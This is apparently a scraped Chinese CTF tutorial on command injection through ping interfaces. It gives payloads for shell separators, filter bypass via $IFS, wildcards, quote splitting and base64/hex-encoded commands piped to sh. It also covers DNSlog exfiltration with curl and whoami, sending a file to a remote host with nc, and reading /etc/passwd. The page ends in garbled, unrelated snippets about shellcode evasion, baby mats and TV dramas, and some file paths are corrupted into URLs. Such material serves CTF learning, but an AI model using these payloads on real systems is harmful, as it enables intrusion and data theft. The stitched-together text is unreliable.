不论在CTF还是实战中,命令执行的场景五花八门,那么往往在一些小型比赛中,会以那种PING接口进行getflag操作。
在用linux命令时候,我们可以一行执行多条命令或者有条件的执行下一条命令,下面我们讲解一下linux命令分号&&和&,|和||的用法。
方式:command1 ; command2
用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。
上一条命令的输出,作为下一条命令参数。ctf里面:ping 127.0.0.1 | ls(只执行ls不执行前面的)
方式:command1 | command
Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着之一个命令的输出会作为 第二个命令的输入,第二个命令的输出又会作为第三个命令的输入,依此类推。
利用一个管道:
# rpm -qa|grep licq
这条命令使用一个管道符“|”建立了一个管道。管道将rpm -qa命令的输出(包括系统中所有安装的RPM包)作为grep命令的输入,从而列出带有licq字符的RPM包来。
利用多个管道:
# cat /etc/passwd | grep /bin/bash | wc -l
这条命令使用了两个管道,利用之一个管道将cat命令(显示passwd文件的内容)的输出送给grep命令,grep命令找出含有“/bin /bash”的所有行;第二个管道将grep的输出送给wc命令,wc命令统计出输入中的行数。这个命令的功能在于找出系统中有多少个用户使用bash。
ctf中用法 ping 127.0.0.1 & ls(先执行ls后执行ping)
&放在启动参数后面表示设置此进程为后台进程
方式:command1 &
默认情况下,进程是前台进程,这时就把Shell给占据了,我们无法进行其他操作,对于那些没有交互的进程,很多时候,我们希望将其在后台启动,可以在启动参数的时候加一个'&'实现这个目的。
ctf中用法 ping 127.0.0.1 && ls(ping命令正确才执行ls 要是ping 1 && ls ls就不会执行)
shell 在执行某个命令的时候,会返回一个返回值,该返回值保存在 shell 变量 $? 中。当 $?==0 时,表示执行成功;当 $?==1 时(我认为是非0的数,返回值在0-255间),表示执行失败。
有时候,下一条命令依赖前一条命令是否执行成功。如:在成功地执行一条命令之后再执行另一条命令,或者在一条命令执行失败后再执行另一条命令等。shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。
语法格式如下:
command1 && command2 [&& command3 ...]
命令之间使用 && 连接,实现逻辑与的功能。
只有在 && 左边的命令返回真(命令返回值 $?==0),&& 右边的命令才会被执行。
只要有一个命令返回假(命令返回值 $?==1),后面的命令就不会被执行。
和&&相反 左边为假才执行命令二
逻辑或的功能
语法格式如下:
command1 || command2 [|| command3 ...]
命令之间使用 || 连接,实现逻辑或的功能。
只有在 || 左边的命令返回假(命令返回值 $?==1),|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同,即实现短路逻辑或操作。
只要有一个命令返回真(命令返回值 $?==0),后面的命令就不会被执行。–直到返回真的地方停止执行。
举例,ping命令判断存活主机
注意 &>要连起来写。
kg=$'\x20flag.txt'&&cat$kg(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
(实用性不是很广,也就type这个命令可以用)
???在linux里面可以进行代替字母
/?/c?t flag.txt
*在linux里面可以进行模糊匹配
cat flag.* *进行模糊匹配php
本地监听端口
nc -lvp 9999
命令执行出 ping 127.0.0.0 & nc ip port > key.php
payload:cat$IFS$1`ls`
使用内联执行会将 ``内的输出作为前面命令的输入,当我们输入上述payload时,等同于cat falg.php;cat index.php
这里提供一个在线网址,可以直接进行给一个利用网址:admin.dnslog.link注册一个账号后会分配一个子域名可以利用。
|curl `whoami`.http://xxxx.xxx(子域名)
这样就会在利用网址看到反弹结果。(这里也不演示了,账号忘记了。。。)这里解释一下\whoami\因为`反引号在linux下是执行命令的特殊符号,原理请见:
http://mp.weixin.qq.com/s/jwqWnP0FHhMoR5b6iCS6NQ
*** 地址转化为数字地址
*** 地址有另外一种表示形式,就是数字地址比如127.0.0.1可以转化为2130706433
可以直接访问
http://2130706433
或者http://0x7F000001
这样就可以绕过.的ip过滤,这里给个转化网址:
通过查看文件的权限 chmod +777赋予权限
l's' -la
c'h'm'o'd +777 /filename
cat:由之一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
dir来查看当前目录文件
ps:目标是获取flag.txt的内容
static-sh读取文件:
static-sh https://www.freebuf.com/articles/network/flag.txt
#输出结果:
https://www.freebuf.com/articles/network/flag.txt: line 1: flag{this_is_a_test}: not found
paste读取文件:
paste https://www.freebuf.com/articles/network/flag.txt /etc/passwd
#输出结果:
flag{this_is_a_test}
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/ *** in:/usr/ *** in/nologin
bin:x:2:2:bin:/bin:/usr/ *** in/nologin
sys:x:3:3:sys:/dev:/usr/ *** in/nologin
sync:x:4:65534:sync:/bin:/bin/sync
diff读取文件 :
diff https://www.freebuf.com/articles/network/flag.txt /etc/passwd
#输出结果:
od读取文件
od -a https://www.freebuf.com/articles/network/flag.txt
#输出结果:
bzmore读取文件:
bzmore https://www.freebuf.com/articles/network/flag.txt
bzless读取文件:
bzless https://www.freebuf.com/articles/network/flag.txtecho `bzless https://www.freebuf.com/articles/network/flag.txt`
#输出结果:
curl读取文件:
curl file:///home/coffee/flag
nc 传输文件
靶机:
nc 10.10.10.10 4444 < /var/www/html/key.php
接受机:
nc -l 4444 > key.txt
wget操作进行目标读取
wget url -P path
一些命令分隔符
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)
过滤了 bash可以用sh
echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
拼接flag 1;a=fl;b=ag.php;cat $a$b
其中有这么一条过滤 *** ,我们用上述 *** 无法绕过,但是我们只要改变一下顺序就可以:1;a=ag.php;b=fl;cat $b$a绕过空格就用上面提到的$IFS$1完整的payload 1;a=ag.php;b=fl;cat$IFS$1$b$aelse if(preg_match("/.*f.*l.*a.*g.*/", $ip)){die("fxck your flag!");}
编码绕过
echo YWJjZGU=|base64 -d //打印出来abcde
echo Y2F0IGZhbGcucGhw|base64 -d|bash //cat flag.php
echo Y2F0IGZhbGcucGhw|base64 -d|sh //cat flag.php
echo 63617420666c61672e706870 | xxd -r -p|bash //cat flag.ph
$(printf “\154\163”) //ls
$(printf “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php
对于关键字还可以用单引号和反斜杠绕过 比如 cat fl’'ag cat fl\ag
总结一下,payload1;a=ag.php;b=fl;cat$IFS$1$b$a和 cat$IFS$1`ls`
得到的flag查看源码。
对于此类题目常考于大学招新赛、机关企业内部CTF比赛、渗透证书的考察点等等,难度不大,就是在于姿势的积累。
在本文中,我们将为读者介绍两种简单的方法,让我们的shellcode可以顺利绕过防病毒引擎。 作为一个基准测试,让我们为32位Windows系统生成标准MSF反向shell payload:...
许多情况下父母们给宝宝换席子上为了更好地让婴儿睡觉的更舒适,可是有婴儿睡觉席子拉肚子,下边的我就而言说:婴儿睡觉席子腹泻怎么办2018 婴儿睡觉席子拉肚子怎么预防。 婴儿睡觉席子腹泻怎么办 小...
今年是广大腐女基友们的福利年,各类腐剧异常的火爆,而之前大热的《上瘾》更是引得全球粉丝都为之倾心。接下来就让小编来盘点一下最近的腐剧吧! —刺客列传— 豆瓣评分:7.4 该剧讲述了五位君主与刺客...
十二星座公主裙(十二星座专属手绘公主裙) 每个女生都有一个公主梦,穿上漂亮的公主裙,有一座豪华的城堡,有一个帅气的白马王子,那是多么幸福的幻想,那么你的专属手绘公主裙是什么样的呢?一起看看十二星座专...
操作机:Windows XP [172.16.11.2]$db->query("UPDATE ".table('ann')." SET click = click+1 WHERE ann_id...
51完全免费查开放房出示:和老公外地日常生活,16年第三季度发觉他的手机上通讯记录有一个联络十分经常的电話,在线时间有零晨的時间较长,他跟我说是顾客沟通交流工作方面的事,显而易见是没拿钱的因为我没...